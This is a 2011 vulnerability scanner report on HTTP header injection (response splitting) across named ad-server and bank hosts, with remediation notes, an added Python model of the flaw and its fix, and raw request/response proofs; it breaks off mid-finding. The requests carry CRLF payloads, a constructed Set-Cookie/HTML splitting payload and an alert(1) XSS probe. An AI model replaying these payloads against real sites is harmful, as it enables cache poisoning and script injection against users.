HTTP Header Injection, DORK, HTTP Response Splitting, CWE-113

HTTP Header Injection in Various Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:37:09 CST 2011.




1. HTTP header injection

1.1. http://102.xg4ken.com/media/redir.php [client parameter]

1.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.3. http://18.xg4ken.com/media/redir.php [url[] parameter]

1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

1.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

1.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]

1.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

1.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

1.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

1.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

1.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

1.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]

1.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]

1.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]

1.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]

1.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]

1.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]

1.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]

1.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]

1.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]

1.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]

1.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

1.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

1.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

1.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

1.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

1.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

1.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

1.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]

1.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

1.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

1.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]

1.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]

1.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]

1.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

1.44. https://ad.doubleclick.net/activity [src parameter]

1.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

1.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

1.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

1.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

1.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]

1.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]

1.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]

1.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]

1.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]

1.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]

1.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]

1.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

1.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]



1. HTTP header injection
There are 63 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header without sanitisation. If an attacker can get carriage-return and line-feed characters (CR LF, sent as %0d%0a in a URL) into the header value, they can terminate the current header and append headers of their own, and by injecting an empty line (two CR LF pairs) they can close the header block entirely and write arbitrary content into the response body. This is also known as HTTP response splitting (CWE-113).

Various kinds of attack can be delivered via HTTP header injection. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request that causes arbitrary JavaScript to appear in the response body. It is also sometimes possible to use header injection to poison the cache of a proxy server through which users access the application: the attacker sends a crafted request that yields a "split" response containing arbitrary content, and if the proxy can be made to associate the injected second response with another URL used within the application, the attacker has a "stored" attack against that URL which compromises other users who request it later. The findings below prove only the precondition: the part of each payload after the CR LF (a bare token such as dd2c0783ef6, with no colon) appears on its own line inside the response headers, which shows that CR and LF pass through unencoded. Whether a particular browser or intermediary then honours an injected header or a split body depends on how strictly it parses the response, so the impact should be confirmed per consumer, not assumed from the scanner's "Certain" confidence rating.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, the data should be strictly validated to prevent header injection. In most situations it is appropriate to allow only short alphanumeric strings to be copied into headers and to reject any other input. At a minimum, input containing any character with an ASCII code below 0x20 (which covers CR, LF and TAB) or equal to 0x7F should be rejected. Three points from the findings below are easy to miss when applying this: first, the check must cover parameter names as well as values, because redir.php (1.2) and /activity (1.43) reflect the whole query string, including arbitrary parameter names, into Location; second, it must cover path segments, because the ad.doubleclick.net endpoints reflect the first REST URL segment into Location; third, percent-encoding only some characters is not enough, as several doubleclick responses encode ';' and '=' in the reflected path (for example the %3Bsz%3D1x1 in 1.7) yet pass CR and LF through, which is exactly the gap the scanner found. The xg4ken.com hosts advertise PHP/4.3.9; PHP 5.1.2 and later refuse to send a header() call whose value contains a newline, which would have stopped these particular injections, but upgrading the runtime is a backstop and not a substitute for validating the input.
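The following is an added example and not part of the scanner report or of any of the scanned applications' code. It models the redirect pattern seen in findings 1.1 to 1.3 (a URL-decoded request parameter concatenated into Location), shows how a CR LF in that value splits the response into an extra header and, with a second pair, a body, gives a re-test check in the spirit of the scanner's own (the text after the CR LF must start a header line of its own), and builds the hardened form the remediation above describes. The target URL is taken from finding 1.1 and the legitimate client id from 1.2; the second payload and the allowlist pattern are constructed for illustration.

```python
# Added example (not from the report or the scanned sites). Models the
# redirect pattern in findings 1.1-1.3 and the remediation given above.
import re
from urllib.parse import unquote

# Payload submitted in finding 1.1 (client parameter), exactly as sent on the wire.
REPORT_PAYLOAD = "6ab39%0d%0add2c0783ef6"
# Constructed payload: a complete extra header, then a blank line and a body.
SPLIT_PAYLOAD = "x%0d%0aSet-Cookie:%20a=b%0d%0a%0d%0a<html>injected</html>"

# Assumption for the hardened path: a client id is a short allowlisted token.
# The legitimate value seen in finding 1.2 is "ca-dp-r-mark03_3ph_js".
CLIENT_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")


def build_redirect_vulnerable(target: str, client_encoded: str) -> bytes:
    """The flawed pattern: the server URL-decodes the parameter and copies it
    verbatim into Location, so CR LF in the value ends the header early."""
    client = unquote(client_encoded)
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {target}&client={client}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def parse_response(raw: bytes):
    """Split a raw response the way a naive client does: the first CRLFCRLF ends
    the header block and every CRLF-delimited line before it is a header field.
    Lines without a colon (the bare token the scanner injects) get name None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        headers.append((name.strip(), value.strip()) if sep else (None, line))
    return lines[0], headers, body


def is_header_injected(raw: bytes, payload_encoded: str) -> bool:
    """Re-test check: the part of the payload after its CR LF must appear at the
    start of a header line of its own, i.e. the CR LF was not encoded away."""
    parts = unquote(payload_encoded).split("\r\n")
    if len(parts) < 2:
        return False
    head = raw.partition(b"\r\n\r\n")[0].decode("latin-1")
    return any(line.startswith(parts[1]) for line in head.split("\r\n")[1:])


def reject_control_chars(value: str) -> str:
    """Minimum bar from the remediation: no byte below 0x20 and no DEL (0x7F)."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    return value


def safe_client_id(value: str) -> str:
    """Preferred bar: a short allowlisted token; anything else is rejected outright."""
    if not CLIENT_ID.fullmatch(value):
        raise ValueError("client id not in allowed format")
    return value


def build_redirect_hardened(target: str, client_encoded: str) -> bytes:
    """Hardened form: the free-form target is screened for control characters and
    the client id is allowlisted. Raises ValueError instead of emitting the header."""
    location = f"{reject_control_chars(target)}&client={safe_client_id(unquote(client_encoded))}"
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    target = "https://www.readydebit.com/prepaid/select.html?mid=160"
    print(parse_response(build_redirect_vulnerable(target, REPORT_PAYLOAD))[1])
    print(parse_response(build_redirect_vulnerable(target, SPLIT_PAYLOAD)))
    try:
        build_redirect_hardened(target, REPORT_PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
```

The parser is deliberately naive: real browsers and proxies differ in how they treat a bare line with no colon or a stray CR, which is why the same reflected CR LF can be a working cache-poisoning primitive behind one proxy and harmless behind another. The hardened builder fails closed: it raises before any header is written rather than trying to strip the offending characters and continue.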


1.1. http://102.xg4ken.com/media/redir.php [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the client request parameter is copied into the Location response header. The payload 6ab39%0d%0add2c0783ef6 was submitted in the client parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=93&camp=4969&affcode=cr20710&cid=7766893513|171567|bank%20accounts&mType=&networkType=content&url[]=https%3A%2F%2Fwww.readydebit.com%2Fprepaid%2Fselect.html%3Fmid%3D160%26pvid5%3Dmmerollout&client=6ab39%0d%0add2c0783ef6 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:42:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=3025018b-a68d-7e28-52f3-0000488919cd; expires=Wed, 04-May-2011 15:42:13 GMT; path=/; domain=.xg4ken.com
Location: https://www.readydebit.com/prepaid/select.html?mid=160&pvid5=mmerollout&client=6ab39
dd2c0783ef6

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5795c%0d%0a925eb9a0928 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=93&camp=4969&affcode=cr20710&cid=7766893513|171567|bank%20accounts&mType=&networkType=content&url[]=https%3A%2F%2Fwww.readydebit.com%2Fprepaid%2Fselect.html%3Fmid%3D160%26pvid5%3Dmmerollout&client=ca-dp-r-mark03_3ph_js&5795c%0d%0a925eb9a0928=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:42:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f8fec1e-1ba4-58c9-eb89-000044f59568; expires=Wed, 04-May-2011 15:42:13 GMT; path=/; domain=.xg4ken.com
Location: https://www.readydebit.com/prepaid/select.html?mid=160&pvid5=mmerollout&client=ca-dp-r-mark03_3ph_js&5795c
925eb9a0928
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://18.xg4ken.com/media/redir.php [url[] parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 3dc4e%0d%0a8b43bea0858 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=134&camp=8291&affcode=kw41499&inhURL=&cid=167204850&mType=e&queryStr=online%20banking&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549059%3B49327498%3Ba%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc1308423dc4e%0d%0a8b43bea0858&defurl=http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=cr41483&cid=167204850&mType=e&queryStr=online%20banking&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549059%3B49327498%3Ba%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130842 HTTP/1.1
Host: 18.xg4ken.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:42:58 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=37147d0d-185e-3a48-2b93-000033904a2f; expires=Wed, 04-May-2011 13:42:58 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225549059;49327498;a?https://www.ally.com/index.html?CP=ppc1308423dc4e
8b43bea0858

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 17340%0d%0a79c188add23 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1508997;host=metric.superpages.com%2Fb%2Fss%2Fsuperpagescom%2F1%2FH.22.1%2Fs93842685804702%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252010%253A37%253A58%25204%2520360%26ns%3Dsuperpages%26pageName%3DMaps%26g%3Dhttp%253A%252F%252Fmapserver.superpages.com%252Fmapbasedsearch%252F%253F%2526SRC%253Dcomlocal1ae0186%252522%25253balert%281%29%252F%252F4a2e6a0ce5b%2526C%253Dbanks%2526L%253D19101%2526CS%253DL%2526MCBP%253Dtrue%2526C%253DBanks%2526STYPE%253DS%2526PS%253D15%2526search%253DFind%252BIt%26r%3Dhttp%253A%252F%252Fburp%252Fshow%252F51%26cc%3DUSD%26vvp%3DDFA%25231508997%253Av25%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3DMaps%26v0%3Dcomlocal1ae0186%2522%253Balert%281%29%252F%252F4a2e6a0ce5b%26events%3Devent1%26v2%3DMaps%26v3%3DMaps%26v6%3DLess%2520than%25201%2520day%26c13%3DLess%2520than%25201%2520day%26c15%3D10%253A30AM%26c16%3DThursday%26c17%3DWeekday%26c18%3DError%2520Page%2520Try%2520Again%26c20%3D100%26v21%3DNon-registered%2520user%26v22%3DEnglish%26c34%3Dcomlocal1ae0186%2522%253Balert%281%29%252F%252F4a2e6a0ce5b%26v40%3D10%253A30AM%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26AQE%3D117340%0d%0a79c188add23&A2S=1;ord=1582166923 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1ae0186%22%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metric.superpages.com/b/ss/superpagescom/1/H.22.1/s93842685804702?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2010%3A37%3A58%204%20360&ns=superpages&pageName=Maps&g=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1ae0186%2522%253balert(1)%2F%2F4a2e6a0ce5b%26C%3Dbanks%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&r=http%3A%2F%2Fburp%2Fshow%2F51&cc=USD&vvp=DFA%231508997%3Av25%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Maps&v0=comlocal1ae0186%22%3Balert(1)%2F%2F4a2e6a0ce5b&events=event1&v2=Maps&v3=Maps&v6=Less%20than%201%20day&c13=Less%20than%201%20day&c15=10%3A30AM&c16=Thursday&c17=Weekday&c18=Error%20Page%20Try%20Again&c20=100&v21=Non-registered%20user&v22=English&c34=comlocal1ae0186%22%3Balert(1)%2F%2F4a2e6a0ce5b&v40=10%3A30AM&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=117340
79c188add23
&A2S=1/respcamphist;src=1508997;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296759132


1.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3867.605.ACCUWEATHER/B5097428.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6fceb%0d%0a0ed31c09936 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6fceb%0d%0a0ed31c09936/N3867.605.ACCUWEATHER/B5097428.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6fceb
0ed31c09936
/N3867.605.ACCUWEATHER/B5097428.13:
Date: Thu, 03 Feb 2011 19:03:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 75094%0d%0a54bf7bd2017 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /75094%0d%0a54bf7bd2017/N884.AccuWeather/B4902356.12 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75094
54bf7bd2017
/N884.AccuWeather/B4902356.12:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 735ad%0d%0a719906bbad3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /735ad%0d%0a719906bbad3/N884.AccuWeather/B4902356.13;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/735ad
719906bbad3
/N884.AccuWeather/B4902356.13%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:49 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a187%0d%0ad171e8daa80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a187%0d%0ad171e8daa80/N884.AccuWeather/B4902356.14 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a187
d171e8daa80
/N884.AccuWeather/B4902356.14:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93dd3%0d%0afa925ac47eb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93dd3%0d%0afa925ac47eb/N884.AccuWeather/B4902356.15 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93dd3
fa925ac47eb
/N884.AccuWeather/B4902356.15:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9863d%0d%0a65dd4847a9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9863d%0d%0a65dd4847a9a/N884.AccuWeather/B4902356.6;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9863d
65dd4847a9a
/N884.AccuWeather/B4902356.6%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.67

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c2b0%0d%0aeac9dd2feb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c2b0%0d%0aeac9dd2feb/N884.AccuWeather/B4902356.67 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c2b0
eac9dd2feb
/N884.AccuWeather/B4902356.67:
Date: Thu, 03 Feb 2011 19:03:55 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76332%0d%0a35da929143b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

